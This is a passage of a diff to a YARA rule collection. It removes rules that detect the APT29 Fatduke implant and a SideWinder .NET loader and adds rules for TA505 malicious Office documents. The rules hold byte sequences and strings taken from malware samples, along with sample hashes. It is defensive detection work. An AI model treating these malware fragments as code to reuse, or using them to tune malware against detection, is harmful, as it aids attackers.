48 8b 7c 24 58 48 83 c4 30 41 5f c3 48 8b c4 48 89 58 08 48 89 68 10 48 89 70 18 48 89 78 20 41 57 48 83 ec 40 33 ff 48 8b da 48 8b f1 }
-		$seq3 = { ff 25 00 00 00 00 00 00 00 00 00 00 00 00 cc }
-		$seq4 = "InitSvc" fullword ascii
+		$s1 = "glColor.dll" fullword ascii
+		$s2 = "{sysdir}\\nvu*.exe" fullword ascii
+		$s3 = "KLSUIrhekheirguhemure" fullword ascii
+		$s4 = "tEo>qM" fullword ascii
+		$s5 = "?\"?0?8?>?I?V?^?l?q?v?{?" fullword ascii
+		$s6 = ";\";0;d;" fullword ascii
+		$s7 = "T0p0v0|0" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 100KB and 3 of them
+		uint16( 0 ) == 0x5a4d and filesize < 900KB and ( pe.imphash ( ) == "ff6dd5f31dd7c538ebc02542f09f4280" and pe.exports ( "setColor" ) or all of them )
 }
-rule ARKBIRD_SOLG_APT_APT29_Fatduke_Mar_2021_1 : FILE
+rule ARKBIRD_SOLG_TA505_Maldoc_21Nov_1 : FILE
 {
 	meta:
-		description = "Detect Fatduke implant used by APT29 group"
+		description = "invitation.doc"
 		author = "Arkbird_SOLG"
-		id = "aed6d6f0-1baf-5842-8ced-e07f213ef1ff"
-		date = "2021-03-08"
-		modified = "2021-03-10"
-		reference = "Internal Research"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-09/APT29/APT_APT29_Fatduke_Mar_2021_1.yar#L1-L25"
+		id = "10562979-0b90-5752-89b8-f0d35121df41"
+		date = "2019-11-21"
+		modified = "2019-11-21"
+		reference = "https://twitter.com/58_158_177_102/status/1197432303057637377"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/20-11-19/Yara_Rule_TA505_Nov19.yar#L52-L83"
 		license_url = "N/A"
-		logic_hash = "2aec00355b14ec81f577527d3eba1f682ce96cc9e6ac7727b3865ddf01ddf69a"
-		score = 50
-		quality = 67
+		logic_hash = "7d2cbc0a505c245aa3e9e8a76cebc7ea7dbd4bd3be26a858f731b96791293ba5"
+		score = 75
+		quality = 50
 		tags = "FILE"
-		hash1 = "0be57d1244fefc679feb7aa9996e539481be7b8f4c9246817f81caa8c2f61a57"
-		level = "Experimental"
+		hash1 = "a197c6de8734044c441438508dd3ce091252de4f98df2016b006a1c963c02505"
 
 	strings:
-		$seq1 = { 5b 8d 8d 5c ff ff ff c7 85 5c ff ff ff 48 74 74 70 51 8d 85 6c ff ff ff c7 85 60 ff ff ff 4f 70 65 6e 50 51 8d 8d 14 fc ff ff c7 85 64 ff ff ff 52 65 71 75 c7 85 68 ff ff ff 65 73 74 57 e8 ce 7b f2 ff c6 45 fc 33 83 78 14 10 72 02 8b 00 50 8d 8d 90 fc ff ff e8 16 7b f2 ff c6 45 fc 34 8d 85 90 fc ff ff 50 8d 85 80 fb ff ff 8b cb 50 e8 bd 74 00 00 8b f0 c6 45 fc 35 8d 87 d0 00 00 00 3b c6 74 2a 8b 48 10 85 c9 74 1b 8b 11 3b c8 0f 95 c0 0f b6 c0 50 ff 52 10 8d 87 d0 00 00 00 c7 40 10 00 00 00 00 56 8b c8 e8 c3 2e f6 ff c6 45 fc 34 8d 8d 80 fb ff ff e8 a4 7e f2 ff c6 45 fc 33 83 bd a4 fc ff ff 10 72 0e ff b5 90 fc ff ff e8 71 0d 17 00 83 c4 04 c7 85 a4 fc ff ff 0f 00 00 00 c7 85 a0 fc ff ff 00 00 00 00 c6 85 90 fc ff ff 00 c6 45 fc 1b 83 bd 28 fc ff ff 10 72 0e ff b5 14 fc ff ff e8 3b 0d 17 00 83 c4 04 c7 85 28 fc ff ff 0f 00 00 00 c7 85 24 fc ff ff 00 00 00 00 c6 85 14 fc ff ff 00 57 bf 0b 3b 0e 02 31 cf 21 d7 21 ff bf 2b 34 81 13 21 c7 09 cf 5f 56 be 22 0c d2 00 be 80 41 78 6d 31 e6 21 ee be 55 13 41 71 90 5e 8d 8d 1c ff ff ff c7 85 1c ff ff ff 48 74 74 70 51 8d 85 32 ff ff ff c7 85 20 ff ff ff 41 64 64 52 50 51 8d 8d 2c fc ff ff c7 85 24 ff ff ff 65 71 75 65 c7 85 28 ff ff ff 73 74 48 65 c7 85 2c ff ff ff 61 64 65 72 66 c7 85 30 ff ff ff 73 57 e8 67 7a f2 ff c6 45 fc 36 83 78 14 10 72 02 8b 00 50 8d 8d 38 fd ff ff e8 af 79 f2 ff c6 45 fc 37 8d 85 38 fd ff ff 50 8d 85 c8 fb ff ff 8b cb 50 e8 36 b1 ff ff 8b f0 c6 45 fc 38 8d 87 e8 00 00 00 3b c6 74 2a 8b 48 10 85 c9 74 1b 8b 11 3b c8 0f 95 c0 0f b6 c0 50 ff 52 10 8d 87 e8 00 00 00 c7 40 10 00 00 00 00 56 8b c8 e8 5c 2d f6 ff c6 45 fc 37 8d 8d c8 fb ff ff e8 3d 7d f2 ff c6 45 fc 36 83 bd 4c fd ff ff 10 72 0e ff b5 38 fd ff ff e8 0a 0c 17 00 83 c4 04 c7 85 4c fd ff ff 0f 00 00 00 c7 85 48 fd ff ff 00 00 00 00 c6 85 38 fd ff ff 00 c6 45 fc 1b 83 bd 40 fc ff ff 10 72 0e ff b5 2c fc ff ff e8 d4 0b 17 00 83 c4 04 c7 85 40 fc ff ff 0f 00 00 00 c7 85 3c fc ff ff 00 00 00 00 c6 85 2c fc ff ff 00 50 b8 dc 4d a8 4d b8 4f 50 97 15 b8 97 55 f0 68 01 c0 01 e8 90 58 50 b8 e6 6f 71 3c 21 e0 21 e8 21 f0 21 c0 31 f0 b8 fa 02 db 55 58 8d 8d 7c ff ff ff c7 85 7c ff ff ff 48 74 74 70 51 8d 45 8c c7 45 80 53 65 6e 64 50 51 8d 8d 60 fc ff ff c7 45 84 52 65 71 75 c7 45 88 65 73 74 57 e8 1f 79 f2 ff c6 45 fc 39 83 78 14 10 72 02 8b 00 50 8d 8d 08 fd ff ff e8 67 78 f2 ff c6 45 fc 3a 8d 85 08 fd ff ff 50 8d 85 f8 fb ff ff 8b cb 50 e8 4e 75 00 00 8b f0 c6 45 fc 3b 8d 87 00 01 00 00 3b c6 74 2a 8b 48 10 85 c9 74 1b 8b 11 3b c8 0f 95 c0 0f b6 c0 50 ff 52 10 8d 87 00 01 00 00 c7 40 10 00 00 00 00 56 8b c8 e8 14 2c f6 ff c6 45 fc 3a 8d 8d f8 fb ff ff e8 f5 7b f2 ff c6 45 fc 39 83 bd 1c fd ff ff 10 72 0e ff b5 08 fd ff ff e8 c2 0a 17 00 83 c4 04 c7 85 1c fd ff ff 0f 00 00 00 c7 85 18 fd ff ff 00 00 00 00 c6 85 08 fd ff ff 00 c6 45 fc 1b 83 bd 74 fc ff ff 10 72 0e ff b5 60 fc ff ff e8 8c 0a 17 00 83 c4 04 c7 85 74 fc ff ff 0f 00 00 00 c7 85 70 fc ff ff 00 00 00 00 c6 85 60 fc ff ff 00 50 01 c8 21 f8 b8 f5 2f 8f 4d 01 e8 09 d0 01 c0 b8 4e 35 2f 2a 58 52 ba 6d 65 6b 13 01 fa 09 da 31 c2 09 da ba c9 1d 51 12 31 c2 5a 8d 4d 9c c7 45 9c 48 74 74 70 51 8d 45 aa c7 45 a0 51 75 65 72 50 51 8d 8d 48 fc ff ff c7 45 a4 79 49 6e 66 66 c7 45 a8 6f 57 e8 de 77 f2 ff c6 45 fc 3c 83 78 14 10 72 02 8b 00 50 8d 8d 50 fd ff ff e8 26 77 f2 ff c6 45 fc 3d 8d 85 50 fd ff ff 50 8d 85 98 fb ff ff 8b cb 50 e8 4d 77 00 00 8b f0 c6 45 fc 3e 8d 9f 18 01 00 00 3b de 74 24 8b 4b 10 85 c9 74 15 8b 11 3b cb 0f 95 c0 0f b6 c0 50 ff 52 10 c7 43 10 00 00 00 00 56 8b cb e8 d9 2a f6 ff c6 45 fc 3d 8d 8d 98 fb ff ff e8 ba 7a f2 ff c6 45 fc 3c 83 bd 64 fd ff ff 10 72 0e ff b5 50 fd ff ff e8 87 09 17 00 83 c4 04 c7 85 64 fd ff ff 0f 00 00 00 c7 85 60 fd ff ff 00 00 00 00 c6 85 50 fd ff ff 00 c6 45 fc 1b 83 bd 5c fc ff ff 10 72 0e ff b5 48 fc ff ff e8 51 09 17 00 83 c4 04 c7 85 5c fc ff ff 0f 00 00 00 c7 85 58 fc ff ff 00 00 00 00 c6 85 48 fc ff ff 00 56 01 d6 19 ee be ed 3e 23 0c 01 fe 21 e6 be db 1f 20 70 31 e6 5e 57 29 c7 bf 8d 30 ff 05 bf 4e 30 f9 71 19 f7 29 f7 31 ff 09 ef 5f 68 b8 b3 2b 10 8d 8d d8 fc ff ff e8 22 76 f2 ff c6 45 fc 3f 8d 8d d8 fc ff ff e8 f3 e5 f3 ff 8b f0 c6 45 fc 1b 83 bd ec fc ff ff 10 72 0e ff b5 d8 fc ff ff e8 ce 08 17 00 83 c4 04 c7 85 ec fc ff ff 0f 00 00 00 c7 85 e8 fc ff ff 00 00 00 00 c6 85 d8 fc ff ff 00 52 ba 13 63 67 6d ba 64 19 d5 47 ba 08 52 da 36 01 ea 29 f2 90 5a 55 bd 53 0d b6 39 bd 54 64 02 7d bd 29 00 37 0f 09 d5 31 c5 90 5d 8d 45 c0 8b ce 50 e8 f4 f0 f4 ff c6 45 fc 40 52 29 c2 ba a5 19 33 0c 19 ea 31 e2 01 c2 ba 3c 66 39 43 29 ca 5a 52 ba f7 42 4e 7a 09 d2 19 c2 19 e2 01 e2 21 ca 01 ca 01 da 90 5a 8d 45 d8 8b ce 50 e8 c9 fa f4 ff c6 45 fc 41 57 01 df 09 d7 bf 16 71 1b 6c bf 80 30 fd 65 01 ff 19 f7 21 ef 5f 50 29 e8 b8 6d 44 90 22 01 e8 21 c8 b8 17 5e 05 78 09 f0 01 e8 58 83 7d d0 00 76 5b 83 7d d4 08 8b 45 c0 73 03 8d 45 c0 83 7d ec 08 8b 4d d8 73 03 8d 4d d8 83 ec 08 50 6a 03 51 8d 4f 40 e8 3c 87 ff ff 89 87 a0 04 00 00 52 31 e2 01 e2 ba b7 14 98 25 01 ca ba 2f 1e d7 1b 19 f2 29 d2 5a 57 bf 75 4c a1 10 bf dc 04 47 09 01 d7 bf 9e 5f 9a 0e 01 e7 90 5f eb 4e 83 7d ec 08 8b 45 d8 73 03 8d 45 d8 83 ec 08 8d 4f 40 6a 00 6a 01 50 e8 ec 86 ff ff 89 87 a0 04 00 00 53 bb ea 4a 79 17 21 eb 31 db bb b9 2c e1 4c 09 d3 21 eb 19 c3 5b 51 b9 91 6c 71 6d b9 64 25 d3 02 19 c1 19 c1 31 e1 29 f1 29 d9 59 83 bf a0 04 00 00 00 0f 85 a6 00 00 00 8d 8d e4 fe ff ff c7 85 e4 fe ff ff 43 61 6e 6e 51 8d 85 00 ff ff ff c7 85 e8 fe ff ff 6f 74 20 70 50 51 8d 8d 68 fb ff ff c7 85 ec fe ff ff 65 72 66 6f c7 85 f0 fe ff ff 72 6d 20 49 c7 85 f4 fe ff ff 6e 74 65 72 c7 85 f8 fe ff ff 6e 65 74 4f c7 85 fc fe ff ff 70 65 6e 21 e8 bd 74 f2 ff c6 45 fc 42 83 78 14 10 }
-		$seq2 = { 59 52 29 d2 ba 02 4d d2 52 ba 5f 54 50 4f 29 ea 29 c2 01 ea 01 e2 5a 56 21 ee 01 ee be 38 36 21 60 31 f6 19 ce 29 d6 be 13 6c 2d 6f 5e 85 c0 0f 85 0a 02 00 00 8d 8d 1c fe ff ff c7 85 1c fe ff ff 43 61 6e 6e 51 8d 85 5e fe ff ff c7 85 20 fe ff ff 6f 74 20 69 50 51 8d 8d c4 f7 ff ff c7 85 24 fe ff ff 6e 69 74 69 c7 85 28 fe ff ff 61 6c 69 7a c7 85 2c fe ff ff 65 20 73 69 c7 85 30 fe ff ff 67 6e 65 72 c7 85 34 fe ff ff 21 20 43 61 c7 85 38 fe ff ff 6e 6e 6f 74 c7 85 3c fe ff ff 20 70 65 72 c7 85 40 fe ff ff 66 6f 72 6d c7 85 44 fe ff ff 20 43 72 79 c7 85 48 fe ff ff 70 74 41 63 c7 85 4c fe ff ff 71 75 69 72 c7 85 50 fe ff ff 65 43 6f 6e c7 85 54 fe ff ff 74 65 78 74 c7 85 58 fe ff ff 20 65 72 72 66 c7 85 5c fe ff ff 6f 72 e8 93 5b f1 ff c6 45 fc 46 83 78 14 10 72 02 8b 00 50 8d 8d f0 f9 ff ff e8 db 5a f1 ff c6 45 fc 47 ff d3 50 8d 85 f0 f9 ff ff 50 8d 8d 78 f8 ff ff e8 c2 e3 f8 ff 68 d4 4f 2e 10 8d 85 78 f8 ff ff 50 e8 3c 31 16 00 8d 8d 64 fe ff ff c7 85 64 fe ff ff 43 61 6e 6e 51 8d 85 a6 fe ff ff c7 85 68 fe ff ff 6f 74 20 69 50 51 8d 8d 94 f7 ff ff c7 85 6c fe ff ff 6e 69 74 69 c7 85 70 fe ff ff 61 6c 69 7a c7 85 74 fe ff ff 65 20 73 69 c7 85 78 fe ff ff 67 6e 65 72 c7 85 7c fe ff ff 21 20 43 61 c7 85 80 fe ff ff 6e 6e 6f 74 c7 85 84 fe ff ff 20 70 65 72 c7 85 88 fe ff ff 66 6f 72 6d c7 85 8c fe ff ff 20 43 72 79 c7 85 90 fe ff ff 70 74 41 63 c7 85 94 fe ff ff 71 75 69 72 c7 85 98 fe ff ff 65 43 6f 6e c7 85 9c fe ff ff 74 65 78 74 c7 85 a0 fe ff ff 20 65 72 72 66 c7 85 a4 fe ff ff 6f 72 e8 8e 5a f1 ff c6 45 fc 48 83 78 14 10 72 02 8b 00 }
-		$seq3 = { c7 85 1c f8 ff ff 07 00 00 00 c7 85 18 f8 ff ff 00 00 00 00 33 c0 66 89 85 08 f8 ff ff 53 19 f3 21 db 21 fb 31 f3 29 fb 19 f3 bb 9f 7a e7 00 21 fb 90 5b 52 ba 77 2c 66 51 ba 60 54 5a 36 19 ea 09 ca ba 32 36 94 1b 90 5a 53 09 eb bb 92 73 c4 2a bb d1 71 ed 5e 01 eb bb 9b 43 21 23 90 5b 50 b8 09 65 36 3a 09 c0 29 e8 29 f8 21 f8 b8 3d 39 c6 44 01 e8 58 89 85 78 fd ff ff 89 85 7c fd ff ff 89 85 80 fd ff ff 89 85 84 fd ff ff 89 85 88 fd ff ff 89 85 8c fd ff ff c7 85 88 f8 ff ff 52 65 67 4f c7 85 8c f8 ff ff 70 65 6e 4b c7 85 90 f8 ff ff 65 79 45 78 c6 85 94 f8 ff ff 57 89 85 48 f8 ff ff 89 85 4c f8 ff ff c7 85 4c f8 ff ff 0f 00 00 00 89 85 48 f8 ff ff 88 85 38 f8 ff ff 8d 85 95 f8 ff ff 50 8d 85 88 f8 ff ff 50 8d 85 38 f8 ff ff 50 50 8b c8 e8 99 c1 de ff c6 45 fc 0a 83 bd 4c f8 ff ff 10 8b 85 38 f8 ff ff 73 06 8d 85 38 f8 ff ff 50 8d }
-		$seq4 = { 31 e1 b9 e9 52 83 05 29 d1 01 f9 59 80 7d 0c 00 0f 84 fb 03 00 00 66 c7 85 70 fe ff ff 0d 0a c7 85 50 fe ff ff 0d 0a 2d 2d c7 85 14 fe ff ff 53 75 62 6d c7 85 18 fe ff ff 69 74 74 65 c6 85 1c fe ff ff 64 c7 85 78 fd ff ff 43 6f 6e 74 c7 85 7c fd ff ff 65 6e 74 2d c7 85 80 fd ff ff 44 69 73 70 c7 85 84 fd ff ff 6f 73 69 74 c7 85 88 fd ff ff 69 6f 6e 3a c7 85 8c fd ff ff 20 66 6f 72 c7 85 90 fd ff ff 6d 2d 64 61 c7 85 94 fd ff ff 74 61 3b 20 c7 85 98 fd ff ff 6e 61 6d 65 c7 85 9c fd ff ff 3d 22 65 6e c7 85 a0 fd ff ff 64 22 0d 0a 66 c7 85 a4 fd ff ff 0d 0a 8d 8d 70 fe ff ff 8d 85 72 fe ff ff 51 50 51 8d 8d 3c fa ff ff e8 b3 34 fb ff 8b d8 c6 45 fc 35 8d 8d 50 fe ff ff 8d 85 54 fe ff ff 51 50 51 8d 8d 6c fa ff ff e8 93 34 fb ff 8b f8 c6 45 fc 36 8d 8d 14 fe ff ff 8d 85 1d fe ff ff 51 50 51 8d 8d 84 fa ff ff e8 73 34 fb ff c6 45 fc 37 83 78 14 10 72 02 8b 00 50 8d 8d 1c f8 ff ff e8 bb 33 fb ff 89 85 7c fe ff ff c6 45 fc 38 8d 8d 78 fd ff ff 8d 85 a6 fd ff ff 51 50 51 8d 8d 80 f8 ff ff e8 37 34 fb ff c6 45 fc 39 83 78 14 10 72 02 8b 00 ff b5 7c fe ff ff 8b d0 8d 8d 04 f7 ff ff e8 88 4e fc ff 83 c4 04 c6 45 fc 3a 83 7f 14 10 72 02 8b 3f 57 8b d0 8d 8d 9c f8 ff ff e8 cb 60 fb ff c6 45 fc 3b 8d 4d d4 51 8b d0 8d 8d 74 f7 ff ff e8 96 b9 00 00 83 c4 08 c6 45 fc 3c 83 7b 14 10 72 02 8b 1b 53 8b d0 8d 8d b8 f8 ff ff e8 99 60 fb ff 83 c4 04 c6 45 fc 3d 6a ff 6a 00 50 8d 4d a4 e8 d5 39 fb ff c6 45 fc 3c 83 bd cc f8 ff ff 10 72 0e ff b5 b8 f8 ff ff e8 d2 c5 1f 00 83 c4 04 c7 85 cc f8 ff ff 0f 00 00 00 c7 85 c8 f8 ff ff 00 00 00 00 c6 85 b8 f8 ff ff 00 c6 45 fc 3b 83 bd 88 f7 ff ff 10 72 0e ff b5 74 f7 ff ff e8 9c c5 1f 00 83 c4 04 c7 85 88 f7 ff ff 0f 00 00 00 c7 85 84 f7 ff ff 00 00 00 00 c6 85 74 f7 ff ff 00 c6 45 fc 3a 83 bd b0 f8 ff ff 10 72 0e ff b5 9c f8 ff ff e8 66 c5 1f 00 83 c4 04 c7 85 b0 f8 ff ff 0f 00 00 00 c7 85 ac f8 ff ff 00 00 00 00 c6 85 9c f8 ff ff 00 c6 45 fc 39 83 bd 18 f7 ff ff 10 72 0e ff b5 04 f7 ff ff e8 30 c5 1f 00 83 c4 04 c7 85 18 f7 ff ff 0f 00 00 00 c7 85 14 f7 ff ff 00 00 00 00 c6 85 04 f7 ff ff 00 c6 45 fc 38 83 bd 94 f8 ff ff 10 72 0e ff b5 80 f8 ff ff e8 fa c4 1f 00 83 c4 04 c7 85 94 f8 ff ff 0f 00 00 00 c7 85 90 f8 ff ff 00 00 00 00 c6 85 80 f8 ff ff 00 c6 45 fc 37 83 bd 30 f8 ff ff 10 72 0e ff b5 1c f8 ff ff e8 c4 c4 1f 00 83 c4 04 c7 85 30 f8 ff ff 0f 00 00 00 c7 85 2c f8 ff ff 00 00 00 00 c6 85 1c f8 ff ff 00 c6 45 fc 36 83 bd 98 fa ff ff 10 72 0e ff b5 84 fa ff ff e8 8e c4 1f 00 83 c4 04 c7 85 98 fa ff ff 0f 00 00 00 c7 85 94 fa ff ff 00 00 00 00 c6 85 84 fa ff ff 00 c6 45 fc 35 83 bd 80 fa ff ff 10 72 0e ff b5 6c fa ff ff e8 58 c4 1f 00 83 c4 04 c7 85 80 fa ff ff 0f 00 00 00 c7 85 7c fa ff ff 00 00 00 00 c6 85 6c fa ff ff 00 c6 45 fc 27 83 bd 50 fa ff ff 10 72 0e ff b5 3c fa ff ff e8 22 c4 1f 00 83 c4 04 c7 85 50 fa ff ff 0f 00 00 00 c7 85 4c fa ff ff 00 00 00 00 c6 85 3c fa ff ff 00 53 19 d3 bb 18 4a 91 1c 21 c3 bb 82 54 5d 2c bb b0 08 2a 58 90 5b 51 21 e9 b9 b9 6e b4 14 31 f1 01 c1 01 f9 19 e1 21 d9 09 f9 90 59 56 be cd 3a 33 5a be 85 1b aa 6f be 1e 6c 78 2d 19 d6 21 e6 90 5e 53 31 f3 bb 8c 21 88 0d 31 db 31 eb 19 d3 19 f3 31 f3 01 f3 90 5b 80 7e 40 00 0f 85 03 06 00 00 66 c7 85 60 fe ff ff 0d 0a c7 85 48 fe ff ff 0d 0a 2d 2d c7 85 d8 fc ff ff 43 6f 6e 74 c7 85 dc fc ff ff 65 6e 74 2d c7 85 e0 fc ff ff 44 69 73 70 c7 85 e4 fc ff ff 6f 73 69 74 c7 85 e8 fc ff ff 69 6f 6e 3a c7 85 ec fc ff ff 20 66 6f 72 c7 85 f0 fc ff ff 6d 2d 64 61 c7 85 f4 fc ff ff 74 61 3b 20 c7 85 f8 fc ff ff 6e 61 6d 65 c7 85 fc fc ff ff 3d 22 63 73 c7 85 00 fd ff ff 72 66 5f 74 c7 85 04 fd ff ff 6f 6b 65 6e c7 85 08 fd ff ff 22 0d 0a 0d c6 85 0c fd ff ff 0a 8d 8d 60 fe ff ff 8d 85 62 fe ff ff 51 50 51 8d 8d 00 f9 ff ff e8 b7 30 fb ff 8b d8 c6 45 fc 3e 8d 8d 48 fe ff ff 8d 85 4c fe ff ff 51 50 51 8d 8d 30 f9 ff ff e8 97 30 }
-		$op1 = { 37 25 38 3d 38 43 38 5e 38 6c 38 77 38 }
-		$op2 = { 3f 25 3f 36 3f 66 3f 74 3f }
-		$op3 = { 68 66 43 78 28 6a 25 }
-		$op4 = { 61 46 25 7c 5f 56 21 }
+		$x1 = "C:\\Users\\J\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.MSO\\basecamp" fullword wide
+		$x2 = "*\\G{42DC991A-7E1B-4254-B210-CDD3DDCFD365}#2.0#0#C:\\Users\\1\\AppData\\Local\\Temp\\VBE\\MSForms.exd#Microsoft Forms 2.0 Object" wide
+		$x3 = "*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\Windows\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library" fullword wide
+		$x4 = "C:\\Users\\J\\AppData\\Local\\Temp\\basecamp" fullword wide
+		$s5 = "*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft " wide
+		$s6 = "*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual" wide
+		$s7 = "glColor.dll" fullword ascii
+		$s8 = "magne.dll" fullword ascii
+		$s9 = "InitScope.dll" fullword wide
+		$s10 = "*\\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\\Windows\\system32\\stdole2.tlb#OLE Automation" fullword wide
+		$s11 = "CopyFiles=@EP0NGJ8D.GPD,@EP0NGN8D.GPD,@EP0NGX8D.GPD,@EP0NCJ8D.CMB,@EP0NOJ8D.DXT,@EP0NOE10.DLL,@EP0NM4RC.DLL,@EP0NRE8D.DLL" fullword wide
+		$s12 = "CopyFiles=@EP0NGJ8C.GPD,@EP0NGN8C.GPD,@EP0NGX8C.GPD,@EP0NCJ8C.CMB,@EP0NOJ8C.DXT,@EP0NOE09.DLL,@EP0NM4RB.DLL,@EP0NRE8C.DLL" fullword wide
+		$s13 = "vspub2.dll-" fullword ascii
+		$s14 = "pictarget" fullword ascii
+		$s15 = "Public Declare Function ZooDcom Lib        \"vspub1.dll\" Alias \"IKAJSL\" () As Integer" fullword ascii
+		$s16 = "\"Epson\"=\"http://go.microsoft.com/fwlink/?LinkID=36&prd=10798&sbp=Printers\"" fullword wide
+		$s17 = "EP0NM4RC.DLL = 1" fullword wide
+		$s18 = "EP0NOE10.DLL = 1" fullword wide
+		$s19 = "EP0NRE8C.DLL = 1" fullword wide
+		$s20 = "EP0NM4RB.DLL = 1" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 350KB and 2 of ( $seq* ) and 3 of ( $op* )
+		uint16( 0 ) == 0xcfd0 and filesize < 3000KB and 1 of ( $x* ) and 4 of them
 }
-
-rule ARKBIRD_SOLG_APT_Sidewinder_NET_Loader_Aug_2020_1 : FILE
+rule ARKBIRD_SOLG_TA505_Maldoc_21Nov_2 : FILE
 {
 	meta:
-		description = "Detected the NET loader used by SideWinder group (August 2020)"
+		description = "invitation (1).xls"
 		author = "Arkbird_SOLG"
-		id = "7334a3b8-cd56-5820-a073-5bd22076644f"
-		date = "2020-08-24"
-		modified = "2020-08-24"
-		reference = "https://twitter.com/ShadowChasing1/status/1297902086747598852"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-08-24/SideWinder/APT_SideWinder_NET_Loader_Aug_2020_1.yar#L3-L21"
+		id = "e6328342-0d08-58a3-befe-15de41649763"
+		date = "2019-11-21"
+		modified = "2019-11-21"
+		reference = "https://twitter.com/58_158_177_102/status/1197432303057637377"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/20-11-19/Yara_Rule_TA505_Nov19.yar#L85-L116"
 		license_url = "N/A"
-		logic_hash = "b40127cd845d75ef81eb230c12635da00dd77fc53e5886c253a2466627aa8534"
+		logic_hash = "84c7f064fb813934e397d81dad8af6288cb919e046cd2bb16f9ca6dc348c43c2"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
-		hash1 = "4a0947dd9148b3d5922651a6221afc510afcb0dfa69d08ee69429c4c75d4c8b4"
+		hash1 = "270b398b697f10b66828afe8d4f6489a8de48b04a52a029572412ae4d20ff89b"
 
 	strings:
-		$s1 = "DUSER.dll" fullword wide
-		$s2 = "UHJvZ3JhbQ==" fullword wide
-		$s3 = ".tmp           " fullword wide
-		$s4 = "U3RhcnQ=" fullword wide
-		$s5 = "Gadgets" fullword ascii
-		$s6 = "AdapterInterfaceTemplateObject" fullword ascii
-		$s7 = "FileRipper" fullword ascii
-		$s8 = "copytight @" fullword wide
+		$x1 = "C:\\Users\\J\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.MSO\\AFFA0BDC.tmp" fullword wide
+		$x2 = "C:\\Users\\J\\AppData\\Local\\Temp\\AFFA0BDC.tmp" fullword wide
+		$x3 = "C:\\Windows\\system32\\FM20.DLL" fullword ascii
+		$x4 = "C:\\Users\\J\\AppData\\Local\\Temp\\VBE\\MSForms.exd" fullword ascii
+		$x5 = "C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL" fullword ascii
+		$x6 = "C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL" fullword ascii
+		$x7 = "*\\G{0D452EE1-E08F-101A-852E-02608C4D0BB4}#2.0#0#C:\\Windows\\system32\\FM20.DLL#Microsoft Forms 2.0 Object Library" fullword wide
+		$x8 = "*\\G{BA45F137-16B2-487D-9A21-F38179C0576C}#2.0#0#C:\\Users\\J\\AppData\\Local\\Temp\\VBE\\MSForms.exd#Microsoft Forms 2.0 Object" wide
+		$s9 = "*\\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE16\\MSO.DLL#Microsoft " wide
+		$s10 = "lIySgefa86jIfdEkSZVDoSs5BDkcalCieNBN4EqfVaEs2wWD4OjpTiOBqDrL3d9WCaDAKZpoJPRnoacfQPhucmy69axznNmRbRY12v3ez5PdAAnpAl5m5NUqKHBKCYb5" ascii
+		$s11 = "35mvkZ9ZvIttuHSTUKWZCdOsh5j4Y1p2pJ3vi5onOXnMcEPIUIK1UWAYq3noPeaDtAdUOxKYvIlNZbqMpJjqpxhCidfpQ9GJXStKA44w7UFlKV9oMK8f5Tn6tKMKsviw" ascii
+		$s12 = "*\\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\\Program Files\\Common Files\\Microsoft Shared\\VBA\\VBA7.1\\VBE7.DLL#Visual" wide
+		$s13 = "verkar.dll" fullword ascii
+		$s14 = "intc.dll" fullword ascii
+		$s15 = "YjAygups4wPzNU7lNIGBuFbv6Triw8rxEPLSjrYSKXdUV8QuzbwJvdHshfBvdh66er47iobvTX1FCqI8d6RuKRcBhsLdYCOC1hPEdTllabYHlcZ1FDsgyLuwoCZYM7Fq" ascii
+		$s16 = "MinuetsOs.dll" fullword wide
+		$s17 = "KaBYL8xLRpN7VMzibXEzxh2GetwfB6MY9k3dRCNncC5eiyKNTaTrcoUDi4TrLrkULX7KSvAHjrw4lXxPRSvBmvWUzz5WRwKTskBtBa4xIlhT1ZruGeI36SIqamksANYW" ascii
+		$s18 = "XmhvJDfd16Hxk6eRMKJ7sqYIVneFVN7iUzRF8or7LKNKW9bhf5a7V5OGwIIvyJrm8yMUoITytLvRMoVWm7z1NawYTkjzP5HbtBLxwp3GkLMjJ74iWVjBjzI8cWadyuRy" ascii
+		$s19 = "Sx3mdokmfv27AYhtFublOb5Exec1r1b5LAAbsRHrjLKTWiG4K9dKXbuQBxY9mt4nu7u9ygaWWTcczlRpGhpsXzgKgTI52IfZRxyZWHFD8pXd9sqqOJBedLy4ZT3OHe5n" ascii
+		$s20 = "C:\\Windows\\system32\\stdole2.tlb" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 4KB and ( ( pe.exports ( "FileRipper" ) and pe.exports ( "Gadgets" ) ) and 5 of them )
+		uint16( 0 ) == 0xcfd0 and filesize < 5000KB and 1 of ( $x* ) and 4 of them
 }
 rule ARKBIRD_SOLG_Mal_Stealer_NET_Redline_Aug_2020_1 : FILE
 {
@@ -156007,293 +155557,235 @@ rule ARKBIRD_SOLG_Mal_Stealer_NET_Redline_Aug_2020_1 : FILE
 	condition:
 		uint16( 0 ) == 0x5a4d and filesize < 90KB and 15 of them
 }
